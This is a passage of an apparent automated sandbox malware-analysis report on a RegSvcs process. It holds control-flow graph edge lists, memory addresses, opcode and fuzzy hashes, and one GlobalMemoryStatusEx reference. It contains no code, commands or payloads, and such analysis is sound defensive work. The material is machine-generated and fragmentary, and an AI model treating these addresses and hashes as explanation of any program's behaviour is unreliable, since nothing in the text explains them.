654c58a-654c5ae 2534->2541 2535->2536 2548 654c47e-654c481 2536->2548 2549 654c46e-654c479 2536->2549 2537->2512 2537->2521 2538->2537 2554 654c5bd-654c5bf 2540->2554 2555 654c5b8-654c5ba 2540->2555 2541->2540 2556 654c6b6-654c6b9 2543->2556 2557 654c6b1 2543->2557 2544->2510 2580 654c6a8 2544->2580 2546->2493 2550 654c38d-654c390 2546->2550 2547->2546 2564 654c483-654c4a7 2548->2564 2565 654c4ac-654c4af 2548->2565 2549->2548 2562 654c400-654c403 2550->2562 2563 654c392-654c3fb 2550->2563 2571 654c5c6-654c5c9 2554->2571 2572 654c5c1 2554->2572 2555->2554 2556->2500 2556->2567 2557->2556 2578 654c405-654c42a 2562->2578 2579 654c42f-654c432 2562->2579 2563->2562 2564->2565 2575 654c4b1-654c4b7 2565->2575 2576 654c4bc-654c4bf 2565->2576 2582 654c6d1-654c6da 2567->2582 2583 654c86a-654c874 2567->2583 2571->2486 2581 654c5cf-654c5d9 2571->2581 2572->2571 2575->2576 2587 654c4c1-654c4c7 2576->2587 2588 654c4cc-654c4cf 2576->2588 2578->2579 2579->2508 2579->2525 2580->2543 2590 654c875-654c8ae 2582->2590 2591 654c6e0-654c6ff 2582->2591 2587->2588 2592 654c4e0-654c4e3 2588->2592 2593 654c4d1-654c4d5 2588->2593 2604 654c8b0-654c8b3 2590->2604 2614 654c705-654c70e 2591->2614 2615 654c858-654c864 2591->2615 2602 654c504-654c507 2592->2602 2603 654c4e5-654c4ff 2592->2603 2593->2501 2601 654c4db 2593->2601 2601->2592 2606 654c511-654c514 2602->2606 2607 654c509-654c50e 2602->2607 2603->2602 2611 654ca6f-654ca72 2604->2611 2612 654c8b9-654c8c7 2604->2612 2606->2506 2606->2517 2607->2606 2616 654ca74-654ca90 2611->2616 2617 654ca95-654ca97 2611->2617 2621 654c8ce-654c8d0 2612->2621 2614->2590 2619 654c714-654c743 call 6546670 2614->2619 2615->2582 2615->2583 2616->2617 2622 654ca9e-654caa1 2617->2622 2623 654ca99 2617->2623 2642 654c785-654c79b 2619->2642 2643 654c745-654c77d 2619->2643 2625 654c8e7-654c911 2621->2625 2626 654c8d2-654c8d5 2621->2626 2622->2604 2627 654caa7-654cab0 2622->2627 2623->2622 2638 654ca64-654ca6e 2625->2638 2639 654c917-654c920 2625->2639 2626->2627 2640 654c926-654ca35 call 6546670 2639->2640 2641 654ca3d-654ca62 2639->2641 2640->2639 2692 654ca3b 2640->2692 2641->2627 2648 654c79d-654c7b1 2642->2648 2649 654c7b9-654c7cf 2642->2649 2643->2642 2648->2649 2658 654c7d1-654c7e5 2649->2658 2659 654c7ed-654c800 2649->2659 2658->2659 2664 654c802-654c80c 2659->2664 2665 654c80e 2659->2665 2666 654c813-654c815 2664->2666 2665->2666 2668 654c846-654c852 2666->2668 2669 654c817-654c81c 2666->2669 2668->2614 2668->2615 2670 654c81e-654c828 2669->2670 2671 654c82a 2669->2671 2673 654c82f-654c831 2670->2673 2671->2673 2673->2668 2674 654c833-654c83f 2673->2674 2674->2668 2692->2638
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2ed7a2628640cb8d18653d44b0623b2fcc163b46a853705279dd1192332349bb
                                                          • Instruction ID: 1fafb7c35186db2e50d70c0334ca548b2553e5e1cf4836ed8ccc5897d916775e
                                                          • Opcode Fuzzy Hash: 2ed7a2628640cb8d18653d44b0623b2fcc163b46a853705279dd1192332349bb
                                                          • Instruction Fuzzy Hash: 80328D34B012098FDF54EBA8E890BAEB7B2FBC8718F108569E505EB355DB35DC418B91
                                                          Function 0654B2E8 Relevance: .6, Instructions: 580COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca93e7e7e3c0b20b1caed7a2642b8442913b3737af7433ddc82f01cda1a959e5
                                                          • Instruction ID: 3112a735eebfedd279c60b5f4cd38d3070c6cf3accb4eb687eab4480ad74f9f7
                                                          • Opcode Fuzzy Hash: ca93e7e7e3c0b20b1caed7a2642b8442913b3737af7433ddc82f01cda1a959e5
                                                          • Instruction Fuzzy Hash: 3E226030E102098BEF64EB6DD494BADB7B2FB89318F648466E405EB391DA35DC81CF51
                                                          Function 06543138 Relevance: .5, Instructions: 545COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3422 6543138-6543159 3423 654315b-654315e 3422->3423 3424 6543184-6543187 3423->3424 3425 6543160-654317f 3423->3425 3426 654318d-65431ac 3424->3426 3427 6543928-654392a 3424->3427 3425->3424 3435 65431c5-65431cf 3426->3435 3436 65431ae-65431b1 3426->3436 3428 6543931-6543934 3427->3428 3429 654392c 3427->3429 3428->3423 3432 654393a-6543943 3428->3432 3429->3428 3440 65431d5-65431e4 3435->3440 3436->3435 3437 65431b3-65431c3 3436->3437 3437->3440 3548 65431e6 call 6543951 3440->3548 3549 65431e6 call 6543958 3440->3549 3441 65431eb-65431f0 3442 65431f2-65431f8 3441->3442 3443 65431fd-65434da 3441->3443 3442->3432 3464 65434e0-654358f 3443->3464 3465 654391a-6543927 3443->3465 3474 6543591-65435b6 3464->3474 3475 65435b8 3464->3475 3477 65435c1-65435d4 3474->3477 3475->3477 3479 6543901-654390d 3477->3479 3480 65435da-65435fc 3477->3480 3479->3464 3481 6543913 3479->3481 3480->3479 3483 6543602-654360c 3480->3483 3481->3465 3483->3479 3484 6543612-654361d 3483->3484 3484->3479 3485 6543623-65436f9 3484->3485 3497 6543707-6543737 3485->3497 3498 65436fb-65436fd 3485->3498 3502 6543745-6543751 3497->3502 3503 6543739-654373b 3497->3503 3498->3497 3504 65437b1-65437b5 3502->3504 3505 6543753-6543757 3502->3505 3503->3502 3506 65438f2-65438fb 3504->3506 3507 65437bb-65437f7 3504->3507 3505->3504 3508 6543759-6543783 3505->3508 3506->3479 3506->3485 3519 6543805-6543813 3507->3519 3520 65437f9-65437fb 3507->3520 3515 6543785-6543787 3508->3515 3516 6543791-65437ae 3508->3516 3515->3516 3516->3504 3522 6543815-6543820 3519->3522 3523 654382a-6543835 3519->3523 3520->3519 3522->3523 3526 6543822 3522->3526 3527 6543837-654383d 3523->3527 3528 654384d-654385e 3523->3528 3526->3523 3529 6543841-6543843 3527->3529 3530 654383f 3527->3530 3532 6543876-6543882 3528->3532 3533 6543860-6543866 3528->3533 3529->3528 3530->3528 3537 6543884-654388a 3532->3537 3538 654389a-65438eb 3532->3538 3534 6543868 3533->3534 3535 654386a-654386c 3533->3535 3534->3532 3535->3532 3539 654388c 3537->3539 3540 654388e-6543890 3537->3540 3538->3506 3539->3538 3540->3538 3548->3441 3549->3441
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fb707accd266af231016047196777769cfeff868ff24e17dab820dce93d033da
                                                          • Instruction ID: 2a09767b6f818cd6c96d94f0baaba18609ee0a59787fd7fe4a99bfbc9ffed874
                                                          • Opcode Fuzzy Hash: fb707accd266af231016047196777769cfeff868ff24e17dab820dce93d033da
                                                          • Instruction Fuzzy Hash: 6D322D35E1071ACBDB14EF75C85469DB7B2BFC9304F20C6A9D449A7224EF31AA85CB90
                                                          Function 06547E48 Relevance: .5, Instructions: 477COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3550 6547e48-6547e66 3551 6547e68-6547e6b 3550->3551 3552 6547e8c-6547e8f 3551->3552 3553 6547e6d-6547e87 3551->3553 3554 6547e91-6547ead 3552->3554 3555 6547eb2-6547eb5 3552->3555 3553->3552 3554->3555 3556 6547eb7-6547ec5 3555->3556 3557 6547ecc-6547ecf 3555->3557 3567 6547ec7 3556->3567 3568 6547eee-6547f04 3556->3568 3560 6547ed1-6547edb 3557->3560 3561 6547edc-6547ede 3557->3561 3563 6547ee5-6547ee8 3561->3563 3564 6547ee0 3561->3564 3563->3551 3563->3568 3564->3563 3567->3557 3570 654811f-6548129 3568->3570 3571 6547f0a-6547f13 3568->3571 3572 6547f19-6547f36 3571->3572 3573 654812a-654815f 3571->3573 3582 654810c-6548119 3572->3582 3583 6547f3c-6547f64 3572->3583 3576 6548161-6548164 3573->3576 3578 6548217-654821a 3576->3578 3579 654816a-6548176 3576->3579 3580 6548446-6548449 3578->3580 3581 6548220-654822f 3578->3581 3586 6548181-6548183 3579->3586 3584 654846c-654846e 3580->3584 3585 654844b-6548467 3580->3585 3595 6548231-654824c 3581->3595 3596 654824e-6548289 3581->3596 3582->3570 3582->3571 3583->3582 3608 6547f6a-6547f73 3583->3608 3589 6548475-6548478 3584->3589 3590 6548470 3584->3590 3585->3584 3591 6548185-654818b 3586->3591 3592 654819b-65481a2 3586->3592 3589->3576 3598 654847e-6548487 3589->3598 3590->3589 3599 654818d 3591->3599 3600 654818f-6548191 3591->3600 3593 65481a4-65481b1 3592->3593 3594 65481b3 3592->3594 3601 65481b8-65481ba 3593->3601 3594->3601 3595->3596 3609 654828f-65482a0 3596->3609 3610 654841a-6548430 3596->3610 3599->3592 3600->3592 3603 65481d1-654820a 3601->3603 3604 65481bc-65481bf 3601->3604 3603->3581 3630 654820c-6548216 3603->3630 3604->3598 3608->3573 3611 6547f79-6547f95 3608->3611 3617 6548405-6548414 3609->3617 3618 65482a6-65482c3 3609->3618 3610->3580 3619 65480fa-6548106 3611->3619 3620 6547f9b-6547fc5 3611->3620 3617->3609 3617->3610 3618->3617 3631 65482c9-65483bf call 6546670 3618->3631 3619->3582 3619->3608 3634 65480f0-65480f5 3620->3634 3635 6547fcb-6547ff3 3620->3635 3683 65483c1-65483cb 3631->3683 3684 65483cd 3631->3684 3634->3619 3635->3634 3641 6547ff9-6548027 3635->3641 3641->3634 3647 654802d-6548036 3641->3647 3647->3634 3648 654803c-654806e 3647->3648 3656 6548070-6548074 3648->3656 3657 6548079-6548095 3648->3657 3656->3634 3658 6548076 3656->3658 3657->3619 3659 6548097-65480ee call 6546670 3657->3659 3658->3657 3659->3619 3685 65483d2-65483d4 3683->3685 3684->3685 3685->3617 3686 65483d6-65483db 3685->3686 3687 65483dd-65483e7 3686->3687 3688 65483e9 3686->3688 3689 65483ee-65483f0 3687->3689 3688->3689 3689->3617 3690 65483f2-65483fe 3689->3690 3690->3617
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72149275eb295820975ce3a8c86608d914928726cd6c90c82de73c19e5581001
                                                          • Instruction ID: a4732765db34e06adef8b995e981584a6bbbfe6ac6bff55ed58f7eec1e77b916
                                                          • Opcode Fuzzy Hash: 72149275eb295820975ce3a8c86608d914928726cd6c90c82de73c19e5581001
                                                          • Instruction Fuzzy Hash: AF028E30B002099FDB54EB78D894BAEB7B2FF84318F148569E505AB355DB35ED42CB90
                                                          Function 0654AD90 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 523 654ad90-654adae 524 654adb0-654adb3 523->524 525 654adb5-654adbe 524->525 526 654adc3-654adc6 524->526 525->526 527 654add0-654add3 526->527 528 654adc8-654adcd 526->528 529 654add5-654ade2 527->529 530 654ade7-654adea 527->530 528->527 529->530 531 654ae04-654ae07 530->531 532 654adec-654adff 530->532 534 654ae21-654ae24 531->534 535 654ae09-654ae12 531->535 532->531 539 654afad-654afb6 534->539 540 654ae2a-654ae2d 534->540 537 654afc7-654afd8 535->537 538 654ae18-654ae1c 535->538 548 654b056 537->548 549 654afda-654affe 537->549 538->534 539->535 541 654afbc-654afc6 539->541 542 654ae50-654ae53 540->542 543 654ae2f-654ae4b 540->543 545 654ae64-654ae66 542->545 546 654ae55-654ae59 542->546 543->542 551 654ae6d-654ae70 545->551 552 654ae68 545->552 546->541 550 654ae5f 546->550 553 654b058-654b05b 548->553 554 654b000-654b003 549->554 550->545 551->524 555 654ae76-654ae9a 551->555 552->551 557 654b2c4-654b2c6 553->557 558 654b061-654b09c 553->558 559 654b005 call 654b2e8 554->559 560 654b012-654b015 554->560 577 654aea0-654aeaf 555->577 578 654afaa 555->578 564 654b2cd-654b2d0 557->564 565 654b2c8 557->565 572 654b0a2-654b0ae 558->572 573 654b28f-654b2a2 558->573 567 654b00b-654b00d 559->567 561 654b017-654b021 560->561 562 654b022-654b025 560->562 568 654b027-654b02b 562->568 569 654b032-654b035 562->569 564->554 570 654b2d6-654b2e0 564->570 565->564 567->560 568->558 574 654b02d 568->574 569->553 571 654b037-654b053 569->571 571->548 583 654b0b0-654b0c9 572->583 584 654b0ce-654b112 572->584 576 654b2a4 573->576 574->569 582 654b2a5 576->582 585 654aec7-654af02 call 6546670 577->585 586 654aeb1-654aeb7 577->586 578->539 582->582 583->576 601 654b114-654b126 584->601 602 654b12e-654b16d 584->602 603 654af04-654af0a 585->603 604 654af1a-654af31 585->604 589 654aeb9 586->589 590 654aebb-654aebd 586->590 589->585 590->585 601->602 609 654b254-654b269 602->609 610 654b173-654b24e call 6546670 602->610 606 654af0c 603->606 607 654af0e-654af10 603->607 617 654af33-654af39 604->617 618 654af49-654af5a 604->618 606->604 607->604 609->573 610->609 620 654af3d-654af3f 617->620 621 654af3b 617->621 623 654af72-654afa3 618->623 624 654af5c-654af62 618->624 620->618 621->618 623->578 626 654af64 624->626 627 654af66-654af68 624->627 626->623 627->623
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dM$dM
                                                          • API String ID: 0-2801238145
                                                          • Opcode ID: 7b6686502004b4ae2ce71ed377fd91e1a787ad17afeedf0d4587ca6095da1a0d
                                                          • Instruction ID: 76216cec6ac6af4e64c8bc36fe8d5da7a2f6a405cd2f09c584dd307b63a69b8b
                                                          • Opcode Fuzzy Hash: 7b6686502004b4ae2ce71ed377fd91e1a787ad17afeedf0d4587ca6095da1a0d
                                                          • Instruction Fuzzy Hash: 13E17E30E1030A9BDF64EFA8D8906AEB7B2BF85304F108569E405EB354DB71DC41CB90
                                                          Function 00F9EC28 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 830 f9ec28-f9ec43 831 f9ec6d-f9ec8c call f9e3a0 830->831 832 f9ec45-f9ec6c 830->832 837 f9ec8e-f9ec91 831->837 838 f9ec92-f9ecf1 831->838 845 f9ecf3-f9ecf6 838->845 846 f9ecf7-f9ed84 GlobalMemoryStatusEx 838->846 850 f9ed8d-f9edb5 846->850 851 f9ed86-f9ed8c 846->851 851->850
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1481867161.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_f90000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3375095fd41f225fc0bb61d9120eff1c854f78c8a44ee1ed80b53581f83d0221
                                                          • Instruction ID: 3b13fbcc3001a705497f090e0aefe97708a11c5702ab8c8c63703cb24b1fcd8a
                                                          • Opcode Fuzzy Hash: 3375095fd41f225fc0bb61d9120eff1c854f78c8a44ee1ed80b53581f83d0221
                                                          • Instruction Fuzzy Hash: 4A412572D043959FDB14CFB9E8047AABFF5AF89210F0585AAE448E7241DB749884CBE1
                                                          Function 00F9ED10 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 854 f9ed10-f9ed4e 855 f9ed56-f9ed84 GlobalMemoryStatusEx 854->855 856 f9ed8d-f9edb5 855->856 857 f9ed86-f9ed8c 855->857 857->856
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 00F9ED77
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1481867161.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_f90000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID:
                                                          • API String ID: 1890195054-0
                                                          • Opcode ID: c9a6c4f7c5706504b9d303ce42313daf78d803a9a30c87e1c0a4a7b8b349c8de
                                                          • Instruction ID: 2289ad550d87c3094c7097d95aa084e6cf0cf10b09d21b8146c9a89248ed514b
                                                          • Opcode Fuzzy Hash: c9a6c4f7c5706504b9d303ce42313daf78d803a9a30c87e1c0a4a7b8b349c8de
                                                          • Instruction Fuzzy Hash: 6211F0B2C00659DBDB10CFAAD444BDEFBF8AF48320F15816AD818A7241D378A954CFA5
                                                          Function 0654D000 Relevance: .8, Instructions: 804COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2122 654d000-654d01b 2123 654d01d-654d020 2122->2123 2124 654d022-654d064 2123->2124 2125 654d069-654d06c 2123->2125 2124->2125 2126 654d0b5-654d0b8 2125->2126 2127 654d06e-654d0b0 2125->2127 2129 654d0c7-654d0ca 2126->2129 2130 654d0ba-654d0bc 2126->2130 2127->2126 2134 654d0cc-654d0e8 2129->2134 2135 654d0ed-654d0f0 2129->2135 2132 654d3a7-654d3b0 2130->2132 2133 654d0c2 2130->2133 2139 654d3b2-654d3b7 2132->2139 2140 654d3bf-654d3cb 2132->2140 2133->2129 2134->2135 2136 654d0f2-654d108 2135->2136 2137 654d10d-654d110 2135->2137 2136->2137 2143 654d112-654d121 2137->2143 2144 654d159-654d15c 2137->2144 2139->2140 2145 654d3d1-654d3e5 2140->2145 2146 654d4dc-654d4e1 2140->2146 2151 654d130-654d13c 2143->2151 2152 654d123-654d128 2143->2152 2147 654d1a5-654d1a8 2144->2147 2148 654d15e-654d16d 2144->2148 2167 654d4e9 2145->2167 2168 654d3eb-654d3fd 2145->2168 2146->2167 2158 654d1f1-654d1f4 2147->2158 2159 654d1aa-654d1ec 2147->2159 2155 654d17c-654d188 2148->2155 2156 654d16f-654d174 2148->2156 2161 654d142-654d154 2151->2161 2162 654da1d-654da30 2151->2162 2152->2151 2155->2162 2169 654d18e-654d1a0 2155->2169 2156->2155 2163 654d1f6-654d238 2158->2163 2164 654d23d-654d240 2158->2164 2159->2158 2161->2144 2184 654da32-654da39 2162->2184 2185 654da3a-654da56 2162->2185 2163->2164 2171 654d242-654d284 2164->2171 2172 654d289-654d28c 2164->2172 2175 654d4ec-654d4f8 2167->2175 2190 654d421-654d423 2168->2190 2191 654d3ff-654d405 2168->2191 2169->2147 2171->2172 2181 654d2d5-654d2d8 2172->2181 2182 654d28e-654d2d0 2172->2182 2175->2148 2183 654d4fe-654d7eb 2175->2183 2187 654d321-654d324 2181->2187 2188 654d2da-654d31c 2181->2188 2182->2181 2336 654d7f1-654d7f7 2183->2336 2337 654da12-654da1c 2183->2337 2184->2185 2186 654da58-654da5b 2185->2186 2196 654da5d-654da79 2186->2196 2197 654da7e-654da81 2186->2197 2201 654d326-654d32b 2187->2201 2202 654d32e-654d331 2187->2202 2188->2187 2211 654d42d-654d439 2190->2211 2199 654d407 2191->2199 2200 654d409-654d415 2191->2200 2196->2197 2204 654da90-654da93 2197->2204 2205 654da83 call 654db75 2197->2205 2208 654d417-654d41f 2199->2208 2200->2208 2201->2202 2209 654d340-654d343 2202->2209 2210 654d333-654d335 2202->2210 2215 654da95-654dac1 2204->2215 2216 654dac6-654dac8 2204->2216 2225 654da89-654da8b 2205->2225 2208->2211 2220 654d345-654d387 2209->2220 2221 654d38c-654d38f 2209->2221 2210->2167 2219 654d33b 2210->2219 2231 654d447 2211->2231 2232 654d43b-654d445 2211->2232 2215->2216 2226 654dacf-654dad2 2216->2226 2227 654daca 2216->2227 2219->2209 2220->2221 2221->2175 2224 654d395-654d397 2221->2224 2236 654d39e-654d3a1 2224->2236 2237 654d399 2224->2237 2225->2204 2226->2186 2239 654dad4-654dae3 2226->2239 2227->2226 2241 654d44c-654d44e 2231->2241 2232->2241 2236->2123 2236->2132 2237->2236 2252 654dae5-654db48 call 6546670 2239->2252 2253 654db4a-654db5f 2239->2253 2241->2167 2245 654d454-654d470 call 6546670 2241->2245 2267 654d472-654d477 2245->2267 2268 654d47f-654d48b 2245->2268 2252->2253 2267->2268 2268->2146 2271 654d48d-654d4da 2268->2271 2271->2167 2338 654d806-654d80f 2336->2338 2339 654d7f9-654d7fe 2336->2339 2338->2162 2340 654d815-654d828 2338->2340 2339->2338 2342 654da02-654da0c 2340->2342 2343 654d82e-654d834 2340->2343 2342->2336 2342->2337 2344 654d836-654d83b 2343->2344 2345 654d843-654d84c 2343->2345 2344->2345 2345->2162 2346 654d852-654d873 2345->2346 2349 654d875-654d87a 2346->2349 2350 654d882-654d88b 2346->2350 2349->2350 2350->2162 2351 654d891-654d8ae 2350->2351 2351->2342 2354 654d8b4-654d8ba 2351->2354 2354->2162 2355 654d8c0-654d8d9 2354->2355 2357 654d9f5-654d9fc 2355->2357 2358 654d8df-654d906 2355->2358 2357->2342 2357->2354 2358->2162 2361 654d90c-654d916 2358->2361 2361->2162 2362 654d91c-654d933 2361->2362 2364 654d935-654d940 2362->2364 2365 654d942-654d95d 2362->2365 2364->2365 2365->2357 2370 654d963-654d97c call 6546670 2365->2370 2374 654d97e-654d983 2370->2374 2375 654d98b-654d994 2370->2375 2374->2375 2375->2162 2376 654d99a-654d9ee 2375->2376 2376->2357
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 569f68d4ae475297eac5ae6ed6bb67e8a53aaf6ca251e5984a296e5d7c2de75a
                                                          • Instruction ID: ec461bac56dc3ef87d90cbad25dc90e72f2318b3cc66241102be7f32effbd799
                                                          • Opcode Fuzzy Hash: 569f68d4ae475297eac5ae6ed6bb67e8a53aaf6ca251e5984a296e5d7c2de75a
                                                          • Instruction Fuzzy Hash: 24624E3060060A8FDB55EBB8E591A9DB3F2FF85708B248A69D005DF355EB71ED46CB80
                                                          Function 0654B700 Relevance: .5, Instructions: 473COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3692 654b700-654b720 3693 654b722-654b725 3692->3693 3694 654b727-654b733 3693->3694 3695 654b738-654b73b 3693->3695 3694->3695 3696 654b74d-654b750 3695->3696 3697 654b73d 3695->3697 3698 654b760-654b763 3696->3698 3699 654b752-654b75b 3696->3699 3703 654b745-654b748 3697->3703 3701 654b765-654b766 3698->3701 3702 654b76b-654b76e 3698->3702 3699->3698 3701->3702 3704 654b770-654b777 3702->3704 3705 654b788-654b78b 3702->3705 3703->3696 3706 654baa1-654bad6 3704->3706 3707 654b77d-654b783 3704->3707 3708 654b7a2-654b7a5 3705->3708 3709 654b78d-654b790 3705->3709 3718 654bad8-654badb 3706->3718 3707->3705 3711 654b7e4-654b7e7 3708->3711 3712 654b7a7-654b7bc 3708->3712 3709->3706 3710 654b796-654b79d 3709->3710 3710->3708 3713 654b7f1-654b7f4 3711->3713 3714 654b7e9-654b7ec 3711->3714 3712->3706 3725 654b7c2-654b7df 3712->3725 3716 654b7f6-654b7fd 3713->3716 3717 654b81e-654b821 3713->3717 3714->3713 3716->3706 3720 654b803-654b813 3716->3720 3723 654b831-654b834 3717->3723 3724 654b823-654b826 3717->3724 3721 654bd47-654bd4a 3718->3721 3722 654bae1-654bb09 3718->3722 3743 654b8a7-654b8ae 3720->3743 3744 654b819 3720->3744 3726 654bd4c-654bd68 3721->3726 3727 654bd6d-654bd6f 3721->3727 3765 654bb13-654bb57 3722->3765 3766 654bb0b-654bb0e 3722->3766 3729 654b836-654b83d 3723->3729 3730 654b84e-654b851 3723->3730 3724->3709 3728 654b82c 3724->3728 3725->3711 3726->3727 3736 654bd76-654bd79 3727->3736 3737 654bd71 3727->3737 3728->3723 3729->3706 3738 654b843-654b849 3729->3738 3731 654b857-654b85a 3730->3731 3732 654ba30-654ba33 3730->3732 3739 654b85c-654b865 3731->3739 3740 654b86a-654b86d 3731->3740 3741 654ba38-654ba3b 3732->3741 3736->3718 3745 654bd7f-654bd88 3736->3745 3737->3736 3738->3730 3739->3740 3746 654b86f-654b878 3740->3746 3747 654b88a-654b88d 3740->3747 3741->3732 3748 654ba3d-654ba40 3741->3748 3743->3706 3750 654b8b4-654b8c4 3743->3750 3744->3717 3746->3706 3751 654b87e-654b885 3746->3751 3747->3724 3754 654b88f-654b892 3747->3754 3752 654ba56-654ba59 3748->3752 3753 654ba42-654ba4b 3748->3753 3750->3732 3767 654b8ca 3750->3767 3751->3747 3752->3732 3757 654ba5b-654ba5e 3752->3757 3753->3746 3756 654ba51 3753->3756 3754->3753 3758 654b898-654b89b 3754->3758 3756->3752 3761 654ba84-654ba86 3757->3761 3762 654ba60-654ba67 3757->3762 3763 654b8a2-654b8a5 3758->3763 3764 654b89d-654b89f 3758->3764 3770 654ba8d-654ba90 3761->3770 3771 654ba88 3761->3771 3762->3706 3768 654ba69-654ba79 3762->3768 3763->3743 3769 654b8cf-654b8d2 3763->3769 3764->3763 3791 654bd3c-654bd46 3765->3791 3792 654bb5d-654bb66 3765->3792 3766->3745 3767->3769 3768->3716 3782 654ba7f 3768->3782 3772 654b8d4-654b8dd 3769->3772 3773 654b8e2-654b8e5 3769->3773 3770->3693 3774 654ba96-654baa0 3770->3774 3771->3770 3772->3773 3776 654b8e7-654b935 call 6546670 3773->3776 3777 654b93a-654b93d 3773->3777 3776->3777 3780 654b951-654b954 3777->3780 3781 654b93f-654b946 3777->3781 3785 654b956-654b95c 3780->3785 3786 654b961-654b964 3780->3786 3781->3699 3783 654b94c 3781->3783 3782->3761 3783->3780 3785->3786 3789 654b974-654b977 3786->3789 3790 654b966-654b96f 3786->3790 3794 654b9b6-654b9b9 3789->3794 3795 654b979-654b98e 3789->3795 3790->3789 3798 654bd32-654bd37 3792->3798 3799 654bb6c-654bbd8 call 6546670 3792->3799 3796 654b9d3-654b9d6 3794->3796 3797 654b9bb-654b9c2 3794->3797 3795->3706 3809 654b994-654b9b1 3795->3809 3801 654b9e0-654b9e3 3796->3801 3802 654b9d8-654b9dd 3796->3802 3797->3706 3800 654b9c8-654b9ce 3797->3800 3798->3791 3826 654bcd2-654bce7 3799->3826 3827 654bbde-654bbe3 3799->3827 3800->3796 3806 654b9e5-654ba01 3801->3806 3807 654ba06-654ba09 3801->3807 3802->3801 3806->3807 3811 654ba2b-654ba2e 3807->3811 3812 654ba0b-654ba26 3807->3812 3809->3794 3811->3732 3811->3741 3812->3811 3826->3798 3828 654bbe5-654bbeb 3827->3828 3829 654bbff 3827->3829 3831 654bbf1-654bbf3 3828->3831 3832 654bbed-654bbef 3828->3832 3833 654bc01-654bc07 3829->3833 3834 654bbfd 3831->3834 3832->3834 3835 654bc1c-654bc29 3833->3835 3836 654bc09-654bc0f 3833->3836 3834->3833 3843 654bc41-654bc4e 3835->3843 3844 654bc2b-654bc31 3835->3844 3837 654bc15 3836->3837 3838 654bcbd-654bccc 3836->3838 3837->3835 3839 654bc84-654bc91 3837->3839 3840 654bc50-654bc5d 3837->3840 3838->3826 3838->3827 3849 654bc93-654bc99 3839->3849 3850 654bca9-654bcb6 3839->3850 3852 654bc75-654bc82 3840->3852 3853 654bc5f-654bc65 3840->3853 3843->3838 3847 654bc35-654bc37 3844->3847 3848 654bc33 3844->3848 3847->3843 3848->3843 3854 654bc9d-654bc9f 3849->3854 3855 654bc9b 3849->3855 3850->3838 3852->3838 3856 654bc67 3853->3856 3857 654bc69-654bc6b 3853->3857 3854->3850 3855->3850 3856->3852 3857->3852
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
